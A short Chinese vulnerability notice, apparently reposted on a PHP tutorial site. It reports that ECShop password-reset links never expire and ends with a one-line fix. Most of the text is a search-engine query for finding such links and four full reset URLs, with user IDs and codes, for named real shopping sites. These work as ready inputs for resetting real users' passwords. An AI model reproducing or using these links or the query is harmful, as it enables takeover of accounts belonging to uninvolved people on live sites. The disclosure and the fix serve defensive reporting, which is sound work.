来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] ECShop找回密码功能设计缺陷,修改密码链接没有时效性可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码只是不知道用户名无法登陆,只能盲改密码谷歌inurl:user php?act=ge...
ECShop找回密码功能设计缺陷,修改密码链接没有时效性
inurl:user.php?act=get_password&uid=
http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0
http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0
http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4
http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85
修复方案:对修改密码的code设置一个时效性。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com